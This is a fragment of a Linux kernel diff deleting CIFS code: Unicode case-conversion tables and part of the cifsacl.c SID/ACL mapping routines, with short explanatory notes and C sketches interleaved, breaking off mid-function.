+-	-1, 0, 0, 0, -1, 0, -1, 0, 0, -1, 0, 0, 0, -1, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 0, -1, -2, 0, -1, -2, 0, -1, -2, 0, -1, 0,	/* 1c0-1cf */
+-	-1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, -79, 0, -1, /* 1d0-1df */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e0-1ef */
+-	0, 0, -1, -2, 0, -1, 0, 0, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1f0-1ff */
+-};
+-
+-/* Upper case range - Greek */
+-static signed char UniCaseRangeU03a0[47] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -38, -37, -37, -37,	/* 3a0-3af */
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 3b0-3bf */
+-	-32, -32, -31, -32, -32, -32, -32, -32, -32, -32, -32, -32, -64,
+-	-63, -63,
+-};
+-
+-/* Upper case range - Cyrillic */
+-static signed char UniCaseRangeU0430[48] = {
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 430-43f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* 440-44f */
+-	0, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, -80, 0, -80, -80,	/* 450-45f */
+-};
+-
+-/* Upper case range - Extended cyrillic */
+-static signed char UniCaseRangeU0490[61] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 490-49f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4a0-4af */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 4b0-4bf */
+-	0, 0, -1, 0, -1, 0, 0, 0, -1, 0, 0, 0, -1,
+-};
+-
+-/* Upper case range - Extended latin and greek */
+-static signed char UniCaseRangeU1e00[509] = {
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e00-1e0f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e10-1e1f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e20-1e2f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e30-1e3f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e40-1e4f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e50-1e5f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e60-1e6f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e70-1e7f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1e80-1e8f */
+-	0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, -59, 0, -1, 0, -1,	/* 1e90-1e9f */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ea0-1eaf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1eb0-1ebf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ec0-1ecf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ed0-1edf */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, -1,	/* 1ee0-1eef */
+-	0, -1, 0, -1, 0, -1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f00-1f0f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f10-1f1f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f20-1f2f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f30-1f3f */
+-	8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f40-1f4f */
+-	0, 8, 0, 8, 0, 8, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f50-1f5f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f60-1f6f */
+-	74, 74, 86, 86, 86, 86, 100, 100, 0, 0, 112, 112, 126, 126, 0, 0,	/* 1f70-1f7f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f80-1f8f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f90-1f9f */
+-	8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fa0-1faf */
+-	8, 8, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fc0-1fcf */
+-	8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	8, 8, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Upper case range - Wide latin */
+-static signed char UniCaseRangeUff40[27] = {
+-	0, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,	/* ff40-ff4f */
+-	-32, -32, -32, -32, -32, -32, -32, -32, -32, -32, -32,
+-};
+-
+-/*
+- * Upper Case Range
+- */
+-const struct UniCaseRange CifsUniUpperRange[] = {
+-	{0x03a0, 0x03ce, UniCaseRangeU03a0},
+-	{0x0430, 0x045f, UniCaseRangeU0430},
+-	{0x0490, 0x04cc, UniCaseRangeU0490},
+-	{0x1e00, 0x1ffc, UniCaseRangeU1e00},
+-	{0xff40, 0xff5a, UniCaseRangeUff40},
+-	{0}
+-};
+-#endif
+-
+-#ifndef UNIUPR_NOLOWER
+-/*
+- * Latin lower case
+- */
+-signed char CifsUniLowerTable[512] = {
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 000-00f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 010-01f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 020-02f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 030-03f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 040-04f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0,	/* 050-05f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 060-06f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 070-07f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 080-08f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 090-09f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0a0-0af */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0b0-0bf */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 0c0-0cf */
+-	32, 32, 32, 32, 32, 32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 0,	/* 0d0-0df */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0e0-0ef */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 0f0-0ff */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 100-10f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 110-11f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 120-12f */
+-	0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1,	/* 130-13f */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0,	/* 140-14f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 150-15f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 160-16f */
+-	1, 0, 1, 0, 1, 0, 1, 0, -121, 1, 0, 1, 0, 1, 0, 0,	/* 170-17f */
+-	0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 79, 0,	/* 180-18f */
+-	0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 190-19f */
+-	1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1,	/* 1a0-1af */
+-	0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0,	/* 1b0-1bf */
+-	0, 0, 0, 0, 2, 1, 0, 2, 1, 0, 2, 1, 0, 1, 0, 1,	/* 1c0-1cf */
+-	0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0,	/* 1d0-1df */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e0-1ef */
+-	0, 2, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1f0-1ff */
+-};
+-
+-/* Lower case range - Greek */
+-static signed char UniCaseRangeL0380[44] = {
+-	0, 0, 0, 0, 0, 0, 38, 0, 37, 37, 37, 0, 64, 0, 63, 63,	/* 380-38f */
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 390-39f */
+-	32, 32, 0, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/* Lower case range - Cyrillic */
+-static signed char UniCaseRangeL0400[48] = {
+-	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 0, 80, 80,	/* 400-40f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 410-41f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* 420-42f */
+-};
+-
+-/* Lower case range - Extended cyrillic */
+-static signed char UniCaseRangeL0490[60] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
+-	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
+-};
+-
+-/* Lower case range - Extended latin and greek */
+-static signed char UniCaseRangeL1e00[504] = {
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
+-	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
+-	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0, 0, 0,	/* 1fc0-1fcf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
+-	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0, 0, 0,	/* 1fe0-1fef */
+-	0, 0, 0, 0, 0, 0, 0, 0,
+-};
+-
+-/* Lower case range - Wide latin */
+-static signed char UniCaseRangeLff20[27] = {
+-	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,	/* ff20-ff2f */
+-	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
+-};
+-
+-/*
+- * Lower Case Range
+- */
+-const struct UniCaseRange CifsUniLowerRange[] = {
+-	{0x0380, 0x03ab, UniCaseRangeL0380},
+-	{0x0400, 0x042f, UniCaseRangeL0400},
+-	{0x0490, 0x04cb, UniCaseRangeL0490},
+-	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
+-	{0xff20, 0xff3a, UniCaseRangeLff20},
+-	{0}
+-};
+-#endif
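
The case tables above implement a two-level lookup: code points below 0x200 go through the dense 512-entry delta tables (CifsUniUpperTable/CifsUniLowerTable), while sparser scripts are covered by per-range delta arrays selected through the {start, end, table} triples in CifsUniUpperRange/CifsUniLowerRange. A minimal standalone sketch of that lookup, with names mirroring the structures above (the kernel's actual helper lives in a header elsewhere and may differ in detail):

struct UniCaseRange {
	unsigned short start;		/* first code point covered */
	unsigned short end;		/* last code point covered */
	const signed char *table;	/* signed delta per code point */
};

/* Convert one UCS-2 code point using a dense base table plus sparse
 * range tables; the {0} entry terminating the range list has a NULL
 * table pointer, which ends the scan. */
static unsigned short uni_convert(unsigned short uc,
				  const signed char base[512],
				  const struct UniCaseRange *ranges)
{
	if (uc < 512)
		return uc + base[uc];
	for (; ranges->table; ranges++) {
		if (uc >= ranges->start && uc <= ranges->end)
			return uc + ranges->table[uc - ranges->start];
	}
	return uc;	/* no mapping: code point has no case pair */
}

Storing signed deltas rather than target code points keeps each entry to one byte; that is why distant pairs (e.g. the 0x1dd entry with delta -79) look odd in the raw tables.
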
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+deleted file mode 100644
+index a6c7566a01821..0000000000000
+--- a/fs/cifs/cifsacl.c
++++ /dev/null
+@@ -1,1672 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2007,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Contains the routines for mapping CIFS/NTFS ACLs
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <linux/keyctl.h>
+-#include <linux/key-type.h>
+-#include <keys/user-type.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "fs_context.h"
+-
+-/* security id for everyone/world system group */
+-static const struct cifs_sid sid_everyone = {
+-	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
+-/* security id for Authenticated Users system group */
+-static const struct cifs_sid sid_authusers = {
+-	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
+-
+-/* S-1-22-1 Unmapped Unix users */
+-static const struct cifs_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-22-2 Unmapped Unix groups */
+-static const struct cifs_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * See https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-
+-/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
+-
+-/* S-1-5-88-1 Unix uid */
+-static const struct cifs_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-2 Unix gid */
+-static const struct cifs_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-3 Unix mode */
+-static const struct cifs_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-static const struct cred *root_cred;
+-
+-static int
+-cifs_idmap_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
+-{
+-	char *payload;
+-
+-	/*
+-	 * If the payload is less than or equal to the size of a pointer, then
+-	 * an allocation here is wasteful. Just copy the data directly to the
+-	 * payload.value union member instead.
+-	 *
+-	 * With this however, you must check the datalen before trying to
+-	 * dereference payload.data!
+-	 */
+-	if (prep->datalen <= sizeof(key->payload)) {
+-		key->payload.data[0] = NULL;
+-		memcpy(&key->payload, prep->data, prep->datalen);
+-	} else {
+-		payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
+-		if (!payload)
+-			return -ENOMEM;
+-		key->payload.data[0] = payload;
+-	}
+-
+-	key->datalen = prep->datalen;
+-	return 0;
+-}
+-
+-static inline void
+-cifs_idmap_key_destroy(struct key *key)
+-{
+-	if (key->datalen > sizeof(key->payload))
+-		kfree(key->payload.data[0]);
+-}
+-
+-static struct key_type cifs_idmap_key_type = {
+-	.name        = "cifs.idmap",
+-	.instantiate = cifs_idmap_key_instantiate,
+-	.destroy     = cifs_idmap_key_destroy,
+-	.describe    = user_describe,
+-};
+-
+-static char *
+-sid_to_key_str(struct cifs_sid *sidptr, unsigned int type)
+-{
+-	int i, len;
+-	unsigned int saval;
+-	char *sidstr, *strptr;
+-	unsigned long long id_auth_val;
+-
+-	/* 3 bytes for prefix */
+-	sidstr = kmalloc(3 + SID_STRING_BASE_SIZE +
+-			 (SID_STRING_SUBAUTH_SIZE * sidptr->num_subauth),
+-			 GFP_KERNEL);
+-	if (!sidstr)
+-		return sidstr;
+-
+-	strptr = sidstr;
+-	len = sprintf(strptr, "%cs:S-%hhu", type == SIDOWNER ? 'o' : 'g',
+-			sidptr->revision);
+-	strptr += len;
+-
+-	/* The authority field is a single 48-bit number */
+-	id_auth_val = (unsigned long long)sidptr->authority[5];
+-	id_auth_val |= (unsigned long long)sidptr->authority[4] << 8;
+-	id_auth_val |= (unsigned long long)sidptr->authority[3] << 16;
+-	id_auth_val |= (unsigned long long)sidptr->authority[2] << 24;
+-	id_auth_val |= (unsigned long long)sidptr->authority[1] << 32;
+-	id_auth_val |= (unsigned long long)sidptr->authority[0] << 48;
+-
+-	/*
+-	 * MS-DTYP states that if the authority is >= 2^32, then it should be
+-	 * expressed as a hex value.
+-	 */
+-	if (id_auth_val <= UINT_MAX)
+-		len = sprintf(strptr, "-%llu", id_auth_val);
+-	else
+-		len = sprintf(strptr, "-0x%llx", id_auth_val);
+-
+-	strptr += len;
+-
+-	for (i = 0; i < sidptr->num_subauth; ++i) {
+-		saval = le32_to_cpu(sidptr->sub_auth[i]);
+-		len = sprintf(strptr, "-%u", saval);
+-		strptr += len;
+-	}
+-
+-	return sidstr;
+-}
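
For reference, the key description built above is the type prefix ("os:" or "gs:") followed by the textual SID, with the 48-bit authority printed in hex only when it exceeds 32 bits, per MS-DTYP. A standalone sketch with hypothetical sample values; it packs the six authority bytes plainly big-endian rather than reproducing the exact shifts above:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint8_t revision = 1;
	uint8_t authority[6] = {0, 0, 0, 0, 0, 5};	/* NT Authority */
	uint32_t sub_auth[] = {21, 1004336348, 1177238915, 682003330, 1000};
	size_t i, num_subauth = sizeof(sub_auth) / sizeof(sub_auth[0]);
	unsigned long long id_auth = 0;

	for (i = 0; i < 6; i++)
		id_auth = (id_auth << 8) | authority[i];

	printf("os:S-%u", revision);
	if (id_auth <= 0xffffffffULL)
		printf("-%llu", id_auth);
	else
		printf("-0x%llx", id_auth);
	for (i = 0; i < num_subauth; i++)
		printf("-%u", (unsigned)sub_auth[i]);
	putchar('\n');	/* os:S-1-5-21-1004336348-1177238915-682003330-1000 */
	return 0;
}
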
+-
+-/*
+- * Compare two SIDs (each roughly equivalent to a UUID for a user or group):
+- * returns zero if they match and non-zero otherwise.
+- */
+-static int
+-compare_sids(const struct cifs_sid *ctsid, const struct cifs_sid *cwsid)
+-{
+-	int i;
+-	int num_subauth, num_sat, num_saw;
+-
+-	if ((!ctsid) || (!cwsid))
+-		return 1;
+-
+-	/* compare the revision */
+-	if (ctsid->revision != cwsid->revision) {
+-		if (ctsid->revision > cwsid->revision)
+-			return 1;
+-		else
+-			return -1;
+-	}
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (ctsid->authority[i] != cwsid->authority[i]) {
+-			if (ctsid->authority[i] > cwsid->authority[i])
+-				return 1;
+-			else
+-				return -1;
+-		}
+-	}
+-
+-	/* compare all of the subauth values if any */
+-	num_sat = ctsid->num_subauth;
+-	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
+-	if (num_subauth) {
+-		for (i = 0; i < num_subauth; ++i) {
+-			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+-				if (le32_to_cpu(ctsid->sub_auth[i]) >
+-					le32_to_cpu(cwsid->sub_auth[i]))
+-					return 1;
+-				else
+-					return -1;
+-			}
+-		}
+-	}
+-
+-	return 0; /* sids compare/match */
+-}
+-
+-static bool
+-is_well_known_sid(const struct cifs_sid *psid, uint32_t *puid, bool is_group)
+-{
+-	int i;
+-	int num_subauth;
+-	const struct cifs_sid *pwell_known_sid;
+-
+-	if (!psid || (puid == NULL))
+-		return false;
+-
+-	num_subauth = psid->num_subauth;
+-
+-	/* check if Mac (or Windows NFS) vs. Samba format for Unix owner SID */
+-	if (num_subauth == 2) {
+-		if (is_group)
+-			pwell_known_sid = &sid_unix_groups;
+-		else
+-			pwell_known_sid = &sid_unix_users;
+-	} else if (num_subauth == 3) {
+-		if (is_group)
+-			pwell_known_sid = &sid_unix_NFS_groups;
+-		else
+-			pwell_known_sid = &sid_unix_NFS_users;
+-	} else
+-		return false;
+-
+-	/* compare the revision */
+-	if (psid->revision != pwell_known_sid->revision)
+-		return false;
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (psid->authority[i] != pwell_known_sid->authority[i]) {
+-			cifs_dbg(FYI, "auth %d did not match\n", i);
+-			return false;
+-		}
+-	}
+-
+-	if (num_subauth == 2) {
+-		if (psid->sub_auth[0] != pwell_known_sid->sub_auth[0])
+-			return false;
+-
+-		*puid = le32_to_cpu(psid->sub_auth[1]);
+-	} else /* 3 subauths, ie Windows/Mac style */ {
+-		*puid = le32_to_cpu(psid->sub_auth[0]);
+-		if ((psid->sub_auth[0] != pwell_known_sid->sub_auth[0]) ||
+-		    (psid->sub_auth[1] != pwell_known_sid->sub_auth[1]))
+-			return false;
+-
+-		*puid = le32_to_cpu(psid->sub_auth[2]);
+-	}
+-
+-	cifs_dbg(FYI, "Unix UID %d returned from SID\n", *puid);
+-	return true; /* well known sid found, uid returned */
+-}
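
To make the two-subauthority (Samba) case concrete: an owner SID of S-1-22-1-1000 matches the sid_unix_users template above and yields uid 1000 from the final sub-authority. A host-endian sketch (the real structures carry sub-authorities little-endian on the wire, and the struct layout here is abbreviated):

#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct sid { uint8_t rev, nsub; uint8_t auth[6]; uint32_t sub[15]; };

int main(void)
{
	struct sid unix_users = {1, 1, {0, 0, 0, 0, 0, 22}, {1}};
	struct sid owner      = {1, 2, {0, 0, 0, 0, 0, 22}, {1, 1000}};

	if (owner.rev == unix_users.rev &&
	    memcmp(owner.auth, unix_users.auth, sizeof(owner.auth)) == 0 &&
	    owner.sub[0] == unix_users.sub[0])
		printf("uid = %u\n", (unsigned)owner.sub[owner.nsub - 1]);
	return 0;	/* prints: uid = 1000 */
}
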
+-
+-static __u16
+-cifs_copy_sid(struct cifs_sid *dst, const struct cifs_sid *src)
+-{
+-	int i;
+-	__u16 size = 1 + 1 + 6;
+-
+-	dst->revision = src->revision;
+-	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
+-	for (i = 0; i < NUM_AUTHS; ++i)
+-		dst->authority[i] = src->authority[i];
+-	for (i = 0; i < dst->num_subauth; ++i)
+-		dst->sub_auth[i] = src->sub_auth[i];
+-	size += (dst->num_subauth * 4);
+-
+-	return size;
+-}
+-
+-static int
+-id_to_sid(unsigned int cid, uint sidtype, struct cifs_sid *ssid)
+-{
+-	int rc;
+-	struct key *sidkey;
+-	struct cifs_sid *ksid;
+-	unsigned int ksid_size;
+-	char desc[3 + 10 + 1]; /* 3 byte prefix + 10 bytes for value + NULL */
+-	const struct cred *saved_cred;
+-
+-	rc = snprintf(desc, sizeof(desc), "%ci:%u",
+-			sidtype == SIDOWNER ? 'o' : 'g', cid);
+-	if (rc >= sizeof(desc))
+-		return -EINVAL;
+-
+-	rc = 0;
+-	saved_cred = override_creds(root_cred);
+-	sidkey = request_key(&cifs_idmap_key_type, desc, "");
+-	if (IS_ERR(sidkey)) {
